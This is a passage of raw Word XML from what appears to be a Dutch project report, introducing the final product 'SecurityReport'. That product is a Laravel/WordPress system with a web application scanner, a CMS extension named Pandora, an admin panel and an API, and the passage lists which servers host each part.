          </w:tcPr>
          <w:p w14:paraId="01DE62D3"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c>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B81D952"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r>
    </w:tbl>
    <w:p w14:paraId="78B62AA1" w14:textId="0B167D07" w:rsidR="00013211" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:t>Tabel 4.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79CAC2" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF4D2A" w14:textId="77777777" w:rsidR="00D41025" w:rsidRDefault="00D41025">
      <w:pPr>
        <w:sectPr w:rsidR="00D41025" w:rsidSect="00512B06">
          <w:headerReference w:type="default" r:id="rId80"/>
          <w:headerReference w:type="first" r:id="rId81"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C732C2" w14:textId="7E93CCE7" w:rsidR="00013211" w:rsidRDefault="00D41025">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253338624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="047BA90F" wp14:editId="2DDFD24E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-409575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1799590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3246755" cy="688340"/>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324675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529D2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5" w:rsidP="00D41025">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Eind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A90F" id="Text Box 554" o:spid="_x0000_s1193" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-32.25pt;margin-top:141.7pt;width:255.65pt;height:54.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3DE529D2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00A14BEE" w:rsidRDefault="002A05E5" w:rsidP="00D41025">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="72"/>
                          <w:szCs w:val="72"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="72"/>
                          <w:szCs w:val="72"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Eindproduct</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253336576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41DD2A08" wp14:editId="04E978A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-469265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3175635</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6286500" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="349" y="0"/>
                    <wp:lineTo x="0" y="1371"/>
                    <wp:lineTo x="0" y="20229"/>
                    <wp:lineTo x="349" y="21600"/>
                    <wp:lineTo x="21295" y="21600"/>
                    <wp:lineTo x="21644" y="20229"/>
                    <wp:lineTo x="21644" y="1371"/>
                    <wp:lineTo x="21295" y="0"/>
                    <wp:lineTo x="349" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="591" name="Rounded Rectangle 591"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6286500" cy="160020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559467" id="Rounded Rectangle 591" o:spid="_x0000_s1026" style="position:absolute;margin-left:-36.95pt;margin-top:250.05pt;width:495pt;height:126pt;z-index:2533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" filled="f" strokecolor="white [3212]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253337600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="589453FD" wp14:editId="5EA5ACB2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-347980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3400425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5842635" cy="1028065"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="551" name="Text Box 551"/>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CDC749A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00D41025">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00435E58">
                              <w:rPr>
                                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                                <w:b/>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="10721BFA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00EF79AD" w:rsidRDefault="002A05E5" w:rsidP="00D41025">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04A80C1B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA4BC9" w:rsidRDefault="002A05E5" w:rsidP="00D41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453FD" id="Text Box 551" o:spid="_x0000_s1194" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-27.4pt;margin-top:267.75pt;width:460.05pt;height:80.9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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5CDC749A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00D41025">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00435E58">
                        <w:rPr>
                          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                          <w:b/>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="10721BFA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00EF79AD" w:rsidRDefault="002A05E5" w:rsidP="00D41025">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04A80C1B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00CA4BC9" w:rsidRDefault="002A05E5" w:rsidP="00D41025"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253339648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E52FD30" wp14:editId="24B35988">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-464820</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>429895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="630555"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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0">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3333504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7831E363" wp14:editId="0728C091">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>-112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7620000" cy="10859135"/>
                <wp:effectExtent l="0" t="0" r="25400" b="37465"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="960" name="Rectangle 960"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7620000" cy="10859135"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="BC2422"/>
                        </a:solidFill>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="BC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F63E" id="Rectangle 960" o:spid="_x0000_s1026" style="position:absolute;margin-left:-1in;margin-top:-8.8pt;width:600pt;height:855.0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" fillcolor="#bc2422" strokecolor="#bc2422" strokeweight="1pt">
                <w10:wrap type="square" anchory="page"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00013211">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F407AF2" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141CEC2A" w14:textId="43262AA0" w:rsidR="00364C92" w:rsidRDefault="00013211" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252919808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10450613" wp14:editId="6145E94C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1021985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="37" name="Rectangle 3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5A871" id="Rectangle 37" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-80.4pt;width:25pt;height:1031.7pt;z-index:-25039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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EE50BB">
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00364C92">
        <w:t>eindproduct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDEBC8" w14:textId="2B5873E2" w:rsidR="00E70EAE" w:rsidRDefault="00E70EAE" w:rsidP="00994238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3268C132" w14:textId="63B87D0D" w:rsidR="00712A4B" w:rsidRDefault="00A55095" w:rsidP="00994238">
      <w:r>
        <w:t>In dit hoofdstuk zal ik het eindproduct</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t xml:space="preserve"> SecurityRaport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> behandelen wat het gehele software</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t>systeem is. Het softwaresysteem dat ik in het concept (H4) heb gedefinieerd heb ik in de afgel</w:t>
      </w:r>
      <w:r w:rsidR="0021386A">
        <w:t>open maanden ontwikkeld met de f</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidR="00CF3D04">
        <w:t>mework Laravel en Wordpress. SecurityReport</w:t>
      </w:r>
      <w:r w:rsidR="009A4925">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bestaat uit twee subsystemen, de </w:t>
      </w:r>
      <w:r w:rsidR="007A423A">
        <w:t>webapplicatie scanner en het</w:t>
      </w:r>
      <w:r w:rsidR="001F11E3">
        <w:t xml:space="preserve"> CMS-</w:t>
      </w:r>
      <w:r w:rsidR="009B4A9C">
        <w:t>extensie Pandora.</w:t>
      </w:r>
      <w:r w:rsidR="00B44E8B">
        <w:t xml:space="preserve"> Het visuele gedeelte van het softwaresysteem za</w:t>
      </w:r>
      <w:r w:rsidR="002911E7">
        <w:t>l ik met illustratie laten zien.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7ED48A" w14:textId="2A15BD11" w:rsidR="0071230E" w:rsidRDefault="0071230E" w:rsidP="00994238">
      <w:r>
        <w:t>Wat zal ik in dit hoofdstuk behandelen?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2632"/>
        <w:gridCol w:w="3033"/>
      </w:tblGrid>
      <w:tr w:rsidR="00863EE2" w14:paraId="22D62A86" w14:textId="77777777" w:rsidTr="0086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shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="2B834A2D" w14:textId="4C8B1A13" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:r>
              <w:t>Systeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3033" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="66C15B3D" w14:textId="7657A74B" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Concept</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089121A" w14:paraId="08F6EC7E"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0D2A17B9" w14:textId="0F74290E" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:r>
              <w:t>Pandora CMS extensie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22DCBACC" w14:textId="7E782780" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>H 4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089121A" w14:paraId="2C3A0A1A"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03DB6316" w14:textId="62905D99" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:r>
              <w:t>Admin Paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1274F725" w14:textId="57639969" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>H 4.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089121A" w14:paraId="47A360FD"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49A2621C" w14:textId="23014164" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="759A9DC4" w14:textId="0236508E" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>H 4.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0089121A" w14:paraId="0D248190"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61CC9C41" w14:textId="78BD060A" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:r>
              <w:t>Webapplicatie scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3033" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01935B5C" w14:textId="069D9F28" w:rsidR="0089121A" w:rsidRDefault="0089121A" w:rsidP="00994238">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>H 4.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D01A263" w14:textId="5DDADD46" w:rsidR="002018B5" w:rsidRDefault="00FF4610">
      <w:r>
        <w:t>Tabel 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518F22CE" w14:textId="77777777" w:rsidR="002018B5" w:rsidRPr="007C63A4" w:rsidRDefault="002018B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C63A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deployment van het systeem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386041B5" w14:textId="256C59EF" w:rsidR="00C8738F" w:rsidRDefault="003620A7">
      <w:r>
        <w:t xml:space="preserve">Het systeem gebruikt </w:t>
      </w:r>
      <w:r w:rsidR="00C8738F">
        <w:t>drie webservers: Apache2, MAMP Apache, Artisan server.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1510" w:tblpY="59"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="0060535C" w14:paraId="5F9367B7" w14:textId="77777777" w:rsidTr="00605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C00000"/>
          </w:tcPr>
          <w:p w14:paraId="75579267" w14:textId="77777777" w:rsidR="0060535C" w:rsidRDefault="0060535C" w:rsidP="0060535C">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3B985F79" w14:textId="77777777" w:rsidR="0060535C" w:rsidRDefault="0060535C" w:rsidP="0060535C">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Systeem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0060535C" w14:paraId="09719723"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FED19D" w14:textId="0840E929" w:rsidR="0060535C" w:rsidRDefault="00415BA1" w:rsidP="0060535C">
            <w:r>
              <w:t>Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EBC50B9"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r>
              <w:t>Wordpress Extensie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0060535C" w14:paraId="3344FA99" w14:textId="77777777" w:rsidTr="0060535C">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65BFC998" w14:textId="535123D7" w:rsidR="0060535C" w:rsidRDefault="0060535C" w:rsidP="0060535C">
            <w:r>
              <w:t>MAMP Apache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09A5A8AF" w14:textId="77777777" w:rsidR="0060535C" w:rsidRDefault="0060535C" w:rsidP="0060535C">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0060535C" w14:paraId="3FBE5BEF"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4E7BD2" w14:textId="77777777" w:rsidR="0060535C" w:rsidRDefault="0060535C" w:rsidP="0060535C">
            <w:r>
              <w:t>Artisan Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75F128FD"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r>
              <w:t>Admin Paneel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E1CED96" w14:textId="3067B8FF" w:rsidR="00496C4F" w:rsidRDefault="00EF24AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253009920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AFB5863" wp14:editId="7C614333">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1689735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1891665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="810895" cy="810895"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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0502" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AF7CF72" wp14:editId="67199124">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1377950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1443990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1391920" cy="341630"/>
                <wp:effectExtent l="25400" t="25400" r="30480" b="39370"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="1182" y="-1606"/>
                    <wp:lineTo x="-394" y="0"/>
                    <wp:lineTo x="-394" y="12848"/>
                    <wp:lineTo x="1182" y="22483"/>
                    <wp:lineTo x="20496" y="22483"/>
                    <wp:lineTo x="21679" y="12848"/>
                    <wp:lineTo x="21679" y="6424"/>
                    <wp:lineTo x="20496" y="-1606"/>
                    <wp:lineTo x="1182" y="-1606"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="716" name="Left-Right Arrow 716"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1391920" cy="341630"/>
                        </a:xfrm>
                        <a:prstGeom prst="lef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0941F"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16" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:108.5pt;margin-top:113.7pt;width:109.6pt;height:26.9pt;z-index:251670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" adj="2651" fillcolor="#c00000" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004B0257">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
